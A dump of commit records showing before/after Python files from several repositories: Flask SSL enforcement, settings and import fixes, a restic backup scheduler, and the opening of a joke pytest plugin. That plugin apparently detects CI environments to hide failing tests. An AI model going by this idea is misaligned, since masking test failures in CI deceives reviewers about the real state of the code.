login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
<commit_msg>Add SSLify to force SSL<commit_after>
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
Add SSLify to force SSLimport logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
<commit_before>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
<commit_msg>Add SSLify to force SSL<commit_after>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
6f8ef313bcf90b7e96d05186eb606ff53d0cea90
|
buchner/settings.py
|
buchner/settings.py
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
Remove last trace of BLUEPRINTS
|
Remove last trace of BLUEPRINTS
|
Python
|
bsd-3-clause
|
rehandalal/buchner
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
Remove last trace of BLUEPRINTS
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
<commit_before>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
<commit_msg>Remove last trace of BLUEPRINTS<commit_after>
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
Remove last trace of BLUEPRINTSimport os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
<commit_before>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
<commit_msg>Remove last trace of BLUEPRINTS<commit_after>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
fc608d8ab5d463c72d5e2e267c14e0c304e39acd
|
Cauldron/bundled/GUI/__init__.py
|
Cauldron/bundled/GUI/__init__.py
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
Fix bug in bundled GUI
|
Fix bug in bundled GUI
|
Python
|
bsd-3-clause
|
alexrudy/Cauldron
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)Fix bug in bundled GUI
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
<commit_before>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)<commit_msg>Fix bug in bundled GUI<commit_after>
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)Fix bug in bundled GUIimport version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
<commit_before>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)<commit_msg>Fix bug in bundled GUI<commit_after>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
d45fb029dc4bf0119062a07b962dbc7fff1f300a
|
skimage/measure/__init__.py
|
skimage/measure/__init__.py
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
Add imports of fit to subpackage
|
Add imports of fit to subpackage
|
Python
|
bsd-3-clause
|
ajaybhat/scikit-image,vighneshbirodkar/scikit-image,almarklein/scikit-image,GaZ3ll3/scikit-image,keflavich/scikit-image,ofgulban/scikit-image,paalge/scikit-image,keflavich/scikit-image,chintak/scikit-image,chintak/scikit-image,chintak/scikit-image,Britefury/scikit-image,youprofit/scikit-image,dpshelio/scikit-image,Hiyorimi/scikit-image,juliusbierk/scikit-image,michaelaye/scikit-image,oew1v07/scikit-image,newville/scikit-image,jwiggins/scikit-image,almarklein/scikit-image,newville/scikit-image,rjeli/scikit-image,paalge/scikit-image,SamHames/scikit-image,GaZ3ll3/scikit-image,WarrenWeckesser/scikits-image,chintak/scikit-image,chriscrosscutler/scikit-image,Hiyorimi/scikit-image,michaelpacer/scikit-image,rjeli/scikit-image,bennlich/scikit-image,ofgulban/scikit-image,bennlich/scikit-image,emon10005/scikit-image,chriscrosscutler/scikit-image,Midafi/scikit-image,Britefury/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,warmspringwinds/scikit-image,paalge/scikit-image,oew1v07/scikit-image,almarklein/scikit-image,juliusbierk/scikit-image,michaelaye/scikit-image,pratapvardhan/scikit-image,bsipocz/scikit-image,Midafi/scikit-image,warmspringwinds/scikit-image,WarrenWeckesser/scikits-image,emon10005/scikit-image,blink1073/scikit-image,dpshelio/scikit-image,ofgulban/scikit-image,jwiggins/scikit-image,robintw/scikit-image,SamHames/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,rjeli/scikit-image,bsipocz/scikit-image,ClinicalGraphics/scikit-image,vighneshbirodkar/scikit-image,youprofit/scikit-image,michaelpacer/scikit-image,SamHames/scikit-image,robintw/scikit-image,ClinicalGraphics/scikit-image,blink1073/scikit-image,pratapvardhan/scikit-image
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
Add imports of fit to subpackage
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
<commit_before>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
<commit_msg>Add imports of fit to subpackage<commit_after>
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
Add imports of fit to subpackagefrom .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
<commit_before>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
<commit_msg>Add imports of fit to subpackage<commit_after>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
3a6d76201104b928c1b9053317c9e61804814ff5
|
pyresticd.py
|
pyresticd.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
Use py3-style print and string-formatting
|
Use py3-style print and string-formatting
|
Python
|
mit
|
Mebus/pyresticd,Mebus/pyresticd
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
Use py3-style print and string-formatting
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
<commit_before>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
<commit_msg>Use py3-style print and string-formatting<commit_after>
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
Use py3-style print and string-formatting#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
<commit_before>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
<commit_msg>Use py3-style print and string-formatting<commit_after>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
2c9d5a8b167f77a69995d55e2b2ef52c90807124
|
pytest_vw.py
|
pytest_vw.py
|
# -*- coding: utf-8 -*-
import os
import pytest
# You didn't see that.
#
# I hope you don't understand this code.
_config = None
EXAMINATORS = [
'CI',
'CONTINUOUS_INTEGRATION',
'BUILD_ID',
'BUILD_NUMBER',
'TEAMCITY_VERSION',
'TRAVIS',
'CIRCLECI',
'JENKINS_URL',
'HUDSON_URL',
'bamboo.buildKey',
'BUILDKITE',
]
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item):
"""Failing test cases are not a problem anymore."""
outcome = yield
